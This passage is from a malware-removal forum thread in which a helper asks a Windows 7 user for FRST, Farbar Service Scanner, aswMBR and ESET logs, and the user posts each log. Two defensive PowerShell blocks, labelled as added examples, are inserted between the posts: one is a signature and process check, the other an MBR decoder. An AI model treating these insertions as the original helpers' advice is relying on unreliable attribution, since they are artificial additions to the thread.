2014-10-17 22:42 - 2014-10-17 22:42 - 00001397 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-10-17 22:42 - 2014-10-17 22:42 - 00001385 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-10-17 22:42 - 2014-10-17 22:42 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-10-17 22:42 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean64.exe
2014-10-17 22:37 - 2014-10-21 21:05 - 00151022 _____ () C:\Windows\PFRO.log
2014-10-17 22:16 - 2014-10-20 17:15 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-10-17 22:16 - 2014-10-17 22:16 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-10-17 21:36 - 2014-10-17 21:36 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Share-to-Web Upload Folder
2014-10-17 21:10 - 2014-10-17 21:10 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Adobe
2014-10-17 21:09 - 2014-10-17 21:09 - 00001449 _____ () C:\Users\JR\Desktop\IE.lnk
2014-10-17 21:09 - 2014-10-17 21:09 - 00001415 _____ () C:\Users\JR\Desktop\IE (64-bit).lnk
2014-10-17 20:58 - 2014-10-17 20:58 - 00119024 _____ () C:\Users\JR\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Intel Corporation
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Canon
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\AVG2013
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\ATI
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Local\Hewlett-Packard
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Local\Avg2013
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Local\ATI
2014-10-17 20:57 - 2014-10-17 20:57 - 00001449 _____ () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-17 20:57 - 2014-10-17 20:57 - 00001415 _____ () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-10-17 20:57 - 2014-10-17 20:57 - 00000020 ___SH () C:\Users\JR\ntuser.ini
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR\AppData\Local\VirtualStore
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR\AppData\Local\NVIDIA Corporation
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR\AppData\Local\Adobe
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR
2014-10-17 20:57 - 2012-09-21 09:10 - 00000000 ____D () C:\Users\JR\AppData\Roaming\TuneUp Software
2014-10-17 20:57 - 2009-12-13 17:53 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Macromedia
2014-10-17 20:57 - 2009-12-03 18:41 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Recovery Manager
2014-10-17 20:57 - 2009-07-13 23:54 - 00000000 ___RD () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-17 20:57 - 2009-07-13 23:49 - 00000000 ___RD () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-10-17 20:22 - 2014-10-17 20:28 - 00005786 _____ () C:\Users\JP\Desktop\Rkill.txt
2014-10-17 19:48 - 2014-10-20 17:54 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-17 19:47 - 2014-10-20 17:53 - 00001108 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-17 19:47 - 2014-10-20 17:53 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-17 19:47 - 2014-10-20 17:53 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-17 19:47 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-17 19:47 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-17 18:43 - 2014-10-21 21:05 - 00000728 _____ () C:\Windows\setupact.log
2014-10-17 18:43 - 2014-10-17 18:43 - 00000000 _____ () C:\Windows\setuperr.log
2014-10-04 14:56 - 2014-10-17 00:48 - 00000000 ____D () C:\Users\Public\Documents\Speedbit
2014-10-04 14:51 - 2014-10-21 20:45 - 00001290 _____ () C:\Users\JP\Desktop\My DAP Downloads.lnk
2014-10-04 14:51 - 2014-10-04 14:51 - 00001041 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Download Accelerator Plus (DAP).lnk
2014-10-04 14:51 - 2014-10-04 14:51 - 00000941 _____ () C:\Users\JP\Desktop\DAP.lnk
2014-10-04 14:51 - 2014-10-04 14:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Download Accelerator Plus (DAP)

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-21 21:09 - 2011-12-29 02:14 - 01747954 _____ () C:\Windows\WindowsUpdate.log
2014-10-21 21:05 - 2013-01-30 22:44 - 00000354 _____ () C:\Windows\Tasks\ROC_PAID_JAN2013_TB_rmv.job
2014-10-21 21:05 - 2013-01-26 11:51 - 00000354 _____ () C:\Windows\Tasks\ROC_JAN2013_TB_rmv.job
2014-10-21 21:05 - 2009-12-03 18:17 - 00000000 ____D () C:\ProgramData\Temp
2014-10-21 21:05 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-21 20:42 - 2009-07-13 23:45 - 00017168 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-21 20:42 - 2009-07-13 23:45 - 00017168 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-21 20:40 - 2009-07-14 00:13 - 00730384 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-21 19:18 - 2012-04-23 21:54 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-21 19:13 - 2012-09-08 10:10 - 00000000 ____D () C:\ProgramData\MFAData
2014-10-20 16:23 - 2012-08-06 17:29 - 00000000 ____D () C:\Users\JP\AppData\Roaming\vlc
2014-10-20 08:19 - 2009-12-03 18:13 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
2014-10-17 22:43 - 2009-12-15 23:07 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-10-17 22:37 - 2009-12-15 23:07 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy
2014-10-17 19:47 - 2012-05-31 22:39 - 00000000 ____D () C:\Users\JP\AppData\Roaming\Malwarebytes
2014-10-17 19:47 - 2009-12-15 21:35 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-17 19:47 - 2009-12-15 21:35 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-10-17 00:29 - 2013-01-21 01:54 - 00000000 ____D () C:\Windows\Minidump
2014-10-08 02:44 - 2010-03-05 23:29 - 00000049 _____ () C:\Windows\NeroDigital.ini
2014-10-04 22:22 - 2012-05-31 22:54 - 00000000 ____D () C:\Users\JP\Documents\Vegas Movie Studio PE 9.0 Projects
2014-10-04 14:52 - 2014-01-14 17:49 - 00000000 ____D () C:\Program Files (x86)\DAP
2014-10-04 14:51 - 2014-01-14 17:49 - 00000000 ____D () C:\ProgramData\SpeedBit
2014-10-04 14:51 - 2012-05-30 22:39 - 00000000 ___RD () C:\Users\JP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-01 11:11 - 2009-12-15 21:35 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-09-26 14:50 - 2012-11-18 15:51 - 00003168 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForJP
2014-09-26 14:50 - 2012-11-18 15:51 - 00000320 _____ () C:\Windows\Tasks\HPCeeScheduleForJP.job
2014-09-24 03:36 - 2012-04-23 21:54 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-09-24 03:36 - 2012-04-23 21:54 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-09-24 03:36 - 2011-05-21 10:17 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-16 19:00

==================== End Of Log ============================

 

 


#10 Machiavelli

    Agent 007

  • Malware Response Instructor
  • 4,087 posts
  • Gender:Male
  • Location:Germany

Posted 22 October 2014 - 09:26 AM

Please download Farbar Service Scanner and run it on the computer with the issue. (If you have Windows Vista / Windows 7 / Windows 8, right-click the FSS icon and select Run as Administrator.)
  • Make sure the following options are checked:
    • Internet Services
    • Windows Firewall
    • System Restore
    • Security Center
    • Windows Update
  • Press "Scan".
  • It will create a log (FSS.txt) in the same directory the tool is run.
  • Please copy and paste the log to your reply.

~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.



#11 padjr

  • Topic Starter
  • Members
  • 19 posts

Posted 22 October 2014 - 08:33 PM

I think you got it.

Here is the log

-------------------------------------
Farbar Service Scanner Version: 21-07-2014
Ran by JP (administrator) on 22-10-2014 at 20:26:02
Running from "C:\Users\JP\Desktop"
Microsoft Windows 7 Professional  Service Pack 1 (X64)
Boot Mode: Normal
****************************************************************

Internet Services:
============

Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.

Windows Firewall:
=============

Firewall Disabled Policy:
==================

System Restore:
============

System Restore Disabled Policy:
========================

Action Center:
============

Windows Update:
============

Windows Autoupdate Disabled Policy:
============================

Other Services:
==============

File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcore.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\SDRSVC.dll => File is digitally signed
C:\Windows\System32\vssvc.exe => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed

**** End of log ****
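The FRST log earlier in the thread ("Bamital & volsnap Check") and the FSS log just above both close with a list of core Windows binaries reported as "File is digitally signed", and the topic itself is about conhost.exe followed by a burst of dllhost.exe (COM Surrogate) processes. As an added example, not code from the thread or from the Farbar tools, the following PowerShell reproduces both checks on the affected machine: the Authenticode status of the binaries those lists cover (with dllhost.exe and conhost.exe added), and every running dllhost.exe/conhost.exe with its parent process and command line. It assumes an elevated PowerShell 3.0 or later (WMF 3.0 installs on Windows 7 SP1); the $critical list and the "Suspicious" heuristic are this example's own choices.

```powershell
# Added triage example for this thread; not FRST, FSS or aswMBR code.
# Assumes: elevated PowerShell 3.0+ (WMF 3.0 installs on Windows 7 SP1).

# Binaries covered by FRST's "Bamital & volsnap Check" and FSS's "File Check",
# plus the two processes the topic starter saw launching (conhost.exe, dllhost.exe).
$critical = @(
    "$env:SystemRoot\System32\winlogon.exe",
    "$env:SystemRoot\System32\wininit.exe",
    "$env:SystemRoot\explorer.exe",
    "$env:SystemRoot\System32\svchost.exe",
    "$env:SystemRoot\System32\services.exe",
    "$env:SystemRoot\System32\userinit.exe",
    "$env:SystemRoot\System32\rpcss.dll",
    "$env:SystemRoot\System32\Drivers\volsnap.sys",
    "$env:SystemRoot\System32\Drivers\tcpip.sys",
    "$env:SystemRoot\System32\dllhost.exe",
    "$env:SystemRoot\System32\conhost.exe"
)

function Test-CriticalSignatures {
    param([string[]]$Paths)
    foreach ($p in $Paths) {
        if (-not (Test-Path -LiteralPath $p)) {
            [pscustomobject]@{ Path = $p; Status = 'MISSING'; Signer = $null }
            continue
        }
        $sig    = Get-AuthenticodeSignature -LiteralPath $p
        $signer = $null
        if ($sig.SignerCertificate) { $signer = $sig.SignerCertificate.Subject }
        # Status is Valid, NotSigned, HashMismatch, UnknownError, ...
        # Caveat: on Windows 7's PowerShell this cmdlet does not consult the catalog
        # files (System32\CatRoot) through which most system binaries are signed, so
        # NotSigned here is inconclusive (cross-check with sigcheck -c or the FRST
        # line above). HashMismatch on a file carrying an embedded signature is the
        # result that matters: the bytes no longer match what Microsoft signed.
        [pscustomobject]@{ Path = $p; Status = $sig.Status; Signer = $signer }
    }
}

function Get-SurrogateProcesses {
    # A COM Surrogate started by the DcomLaunch service (svchost.exe) carries
    # /Processid:{GUID} on its command line and runs from System32 or SysWOW64.
    # An instance without that switch, with an unreadable command line, or with
    # an image elsewhere is what to look at first (heuristic, not a verdict).
    $sysdir = [regex]::Escape($env:SystemRoot)
    $procs  = Get-CimInstance Win32_Process -Filter "Name='dllhost.exe' OR Name='conhost.exe'"
    foreach ($p in $procs) {
        $parent     = Get-CimInstance Win32_Process -Filter "ProcessId=$($p.ParentProcessId)"
        $parentText = "<exited> ($($p.ParentProcessId))"
        if ($parent) { $parentText = "$($parent.Name) ($($parent.ProcessId))" }
        $fromSystemDir = $p.ExecutablePath -match "^$sysdir\\(System32|SysWOW64)\\"
        $hasAppId      = $p.CommandLine -match '/Processid:\{[0-9A-Fa-f-]{36}\}'
        [pscustomobject]@{
            Pid         = $p.ProcessId
            Name        = $p.Name
            Image       = $p.ExecutablePath
            Parent      = $parentText
            CommandLine = $p.CommandLine
            Suspicious  = ($p.Name -eq 'dllhost.exe' -and -not ($hasAppId -and $fromSystemDir))
        }
    }
}

Test-CriticalSignatures -Paths $critical | Format-Table -AutoSize
Get-SurrogateProcesses | Sort-Object Suspicious -Descending | Format-Table -AutoSize -Wrap
```

Run it while the symptom is active (right after opening a folder or starting IE, as the topic starter describes), since the dllhost.exe instances disappear once ended from Task Manager. The parent column is the useful part: a surrogate whose parent is not svchost.exe, or whose parent has already exited, is not what DcomLaunch normally produces.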



#12 Machiavelli

    Agent 007

  • Malware Response Instructor
  • 4,087 posts
  • Gender:Male
  • Location:Germany

Posted 23 October 2014 - 07:06 AM

aswMBR

Please download aswMBR from one of the links below and save it to your Desktop.

Download Mirror #1

  • Right-click on aswMBR.exe and select Run as Administrator.
  • Click Yes when asked to download the Avast! definitions.
  • Click Scan to initiate the scan.
  • When the scan finishes, click Save Log and save this to your Desktop.
  • Copy (Ctrl+C) and Paste (Ctrl+V) the contents of this log into your next post please.

~Machiavelli



#13 padjr

  • Topic Starter
  • Members
  • 19 posts

Posted 23 October 2014 - 08:08 PM

Here is the log

------------------
aswMBR version 1.0.1.2161 Copyright© 2014 AVAST Software
Run date: 2014-10-23 19:48:30
-----------------------------
19:48:30.577    OS Version: Windows x64 6.1.7601 Service Pack 1
19:48:30.577    Number of processors: 8 586 0x1A05
19:48:30.577    ComputerName: JIM-PC  UserName: JP
19:48:31.000    Initialize success
19:48:31.023    VM: initialized successfully
19:48:31.056    VM: Intel CPU BiosDisabled
19:49:04.644    VM: disk I/O iaStor.sys
19:50:44.840    AVAST engine defs: 14102302
19:51:35.477    Disk 0  \Device\Harddisk0\DR0 -> \Device\Scsi\JRAID1Port0Path0Target0Lun0
19:51:35.479    Disk 0 Vendor: WDC_____ 150. Size: 1907729MB BusType: 8
19:51:35.481    Disk 1 (boot) \Device\Harddisk1\DR1 -> \Device\Ide\IAAStorageDevice-1
19:51:35.483    Disk 1 Vendor: SAMSUNG_ VT10 Size: 238475MB BusType: 8
19:51:35.605    Disk 1 MBR read successfully
19:51:35.608    Disk 1 MBR scan
19:51:35.611    Disk 1 unknown MBR code
19:51:35.618    Disk 1 Partition 1 80 (A) 07    HPFS/NTFS NTFS          100 MB offset 2048
19:51:35.622    Disk 1 default boot code
19:51:35.625    Disk 1 Partition 2 00     07    HPFS/NTFS NTFS       102587 MB offset 206848
19:51:35.630    Disk 1 Partition - 00     0F Extended LBA            123027 MB offset 210307072
19:51:35.660    Disk 1 Partition 3 00     07    HPFS/NTFS NTFS        12756 MB offset 462267777
19:51:35.691    Disk 1 Partition 4 00     07    HPFS/NTFS NTFS       123026 MB offset 210309120
19:51:35.723    Disk 1 scanning C:\Windows\system32\drivers
19:51:46.211    Service scanning
19:52:09.877    Modules scanning
19:52:09.881    Disk 1 trace - called modules:
19:52:09.901    ntoskrnl.exe CLASSPNP.SYS disk.sys iaStor.sys hal.dll
19:52:09.904    1 nt!IofCallDriver -> \Device\Harddisk1\DR1[0xfffffa800cce5060]
19:52:09.907    3 CLASSPNP.SYS[fffff88001b3e43f] -> nt!IofCallDriver -> \Device\Ide\IAAStorageDevice-1[0xfffffa800ab7f050]
19:52:10.376    AVAST engine scan C:\Windows
19:52:12.540    AVAST engine scan C:\Windows\system32
19:55:23.688    AVAST engine scan C:\Windows\system32\drivers
19:55:39.126    AVAST engine scan C:\Users\JP
19:59:51.766    File: C:\Users\JP\Documents\IP Cam\IP-Cam 1\Tools\Upgrade_tool\HFS.exe  **INFECTED** Win32:SFH-B [Tool]
19:59:54.846    File: C:\Users\JP\Documents\IP Cam\IP-Cam 2\Tools\Upgrade_tool\HFS.exe  **INFECTED** Win32:SFH-B [Tool]
20:00:47.885    AVAST engine scan C:\ProgramData
20:06:11.960    Disk 1 statistics 4043038/0/0 @ 3.28 MB/s
20:06:11.966    Scan finished successfully
20:06:37.568    Disk 1 MBR has been saved successfully to "C:\Users\JP\Desktop\MBR.dat"
20:06:37.571    The log file has been saved successfully to "C:\Users\JP\Desktop\aswMBR.txt"

---------------------------
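The aswMBR log above reads sector 0 of disk 1, reports "unknown MBR code" followed by "default boot code", lists the primary partition entries (boot flag 80, type 07 HPFS/NTFS, start offset in sectors) and saves the sector to C:\Users\JP\Desktop\MBR.dat. As an added example, not aswMBR code, the following PowerShell decodes that saved sector so the partition lines can be re-derived by hand (the 100 MB entry at offset 2048 is 204800 sectors, which is exactly where partition 2 starts at 206848), and hashes the 440 bytes of boot code so they can be compared with a dump from a clean machine. It assumes PowerShell 3.0 or later and that MBR.dat is a raw 512-byte sector; the reference dump path in the last line is hypothetical.

```powershell
# Added example for this thread; not aswMBR code.
# Assumes: PowerShell 3.0+, and MBR.dat is the raw 512-byte sector 0 that aswMBR saved.

function Read-Mbr {
    param([Parameter(Mandatory = $true)][string]$Path)
    $b = [System.IO.File]::ReadAllBytes($Path)
    if ($b.Length -lt 512) { throw "$Path is $($b.Length) bytes; a raw MBR is 512" }
    if ($b[510] -ne 0x55 -or $b[511] -ne 0xAA) { Write-Warning "$Path lacks the 55 AA boot signature" }

    # Layout: 0-439 boot code, 440-443 NT disk signature, 444-445 reserved,
    # 446-509 four 16-byte partition entries, 510-511 boot signature.
    $sha  = [System.Security.Cryptography.SHA256]::Create()
    $hash = ($sha.ComputeHash([byte[]]($b[0..439])) | ForEach-Object { $_.ToString('x2') }) -join ''

    $types = @{ 0x05 = 'Extended'; 0x07 = 'HPFS/NTFS'; 0x0B = 'FAT32'; 0x0C = 'FAT32 LBA';
                0x0F = 'Extended LBA'; 0x27 = 'Hidden NTFS (WinRE)'; 0xEE = 'GPT protective' }
    $parts = for ($i = 0; $i -lt 4; $i++) {
        $o    = 446 + 16 * $i
        $type = [int]$b[$o + 4]                      # cast so the hashtable lookup matches
        if ($type -eq 0) { continue }                 # empty slot
        $name = $types[$type]
        if (-not $name) { $name = 'Other' }
        $sectors = [BitConverter]::ToUInt32($b, $o + 12)
        [pscustomobject]@{
            Index    = $i + 1
            Bootable = ($b[$o] -eq 0x80)             # 80 = active, as in "Partition 1 80 (A)"
            TypeHex  = '{0:X2}' -f $type
            Type     = $name
            StartLBA = [BitConverter]::ToUInt32($b, $o + 8)
            SizeMB   = [math]::Round($sectors * 512 / 1MB)
        }
    }
    # Limitation: logical partitions inside an "Extended LBA" entry live in a chain
    # of EBRs that this function does not walk; only the primary table is decoded.
    [pscustomobject]@{
        DiskSignature  = '{0:X8}' -f [BitConverter]::ToUInt32($b, 440)
        BootCodeSHA256 = $hash
        Partitions     = $parts
    }
}

function Compare-MbrBootCode {
    # Hash-compare the 440 boot-code bytes of two dumps. The reference should come
    # from a clean machine with the same Windows version; a differing hash is worth
    # a disassembly before trusting a scanner's "default boot code" verdict.
    param([string]$Sample, [string]$Reference)
    $s = Read-Mbr -Path $Sample
    $r = Read-Mbr -Path $Reference
    [pscustomobject]@{
        Sample    = $s.BootCodeSHA256
        Reference = $r.BootCodeSHA256
        Match     = ($s.BootCodeSHA256 -eq $r.BootCodeSHA256)
    }
}

$mbr = Read-Mbr -Path "$env:USERPROFILE\Desktop\MBR.dat"
$mbr | Select-Object DiskSignature, BootCodeSHA256 | Format-List
$mbr.Partitions | Format-Table -AutoSize
# Hypothetical reference path; replace with a dump taken from a known-clean system:
# Compare-MbrBootCode -Sample "$env:USERPROFILE\Desktop\MBR.dat" -Reference 'D:\clean-win7-mbr.dat'
```

Against the log above, the decoded table should show three primary entries: the 100 MB active NTFS entry at LBA 2048, the 102587 MB NTFS entry at LBA 206848, and the Extended LBA container at LBA 210307072; partitions 3 and 4 in aswMBR's output are logical volumes inside that container and will not appear here.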
 



#14 Machiavelli

    Agent 007

  • Malware Response Instructor
  • 4,087 posts
  • Gender:Male
  • Location:Germany

Posted 23 October 2014 - 11:48 PM

IMPORTANT: You MUST use Internet Explorer for this step!
  • Visit the ESET Online Scanner Web Page
  • Select the blue Run ESET Online Scanner button.
  • Tick the box next to YES, I accept the Terms of Use and click Start.
  • When asked, allow the ActiveX control to install.
  • Select Enable detection of potentially unwanted applications and select Advanced Settings.
  • Make sure the options Remove found threats and Enable Anti-Stealth technology are checked.
  • Click Start. (This scan can take several hours, so please be patient.)
  • Once the scan is completed, select List of found threats.
  • Select Export to text file... and save the file as ESETlog.txt on your Desktop.
  • Click the Back button.
  • Click the Finish button.
  • Use Notepad to open the saved log file (on your Desktop - ESET.txt).
  • Copy and paste that log as a reply to this topic.

~Machiavelli



#15 padjr

  • Topic Starter
  • Members
  • 19 posts

Posted 25 October 2014 - 02:54 AM

Here is the log

--------------------
C:\Users\JP\AppData\Local\Temp\Stub\-1478723801\bundle.tmp a variant of Win32/SBWatchman.A potentially unwanted application 
C:\Documents and Settings\JP\AppData\Local\Temp\Stub\-1478723801\bundle.tmp a variant of Win32/SBWatchman.A potentially unwanted application deleted - quarantined
 





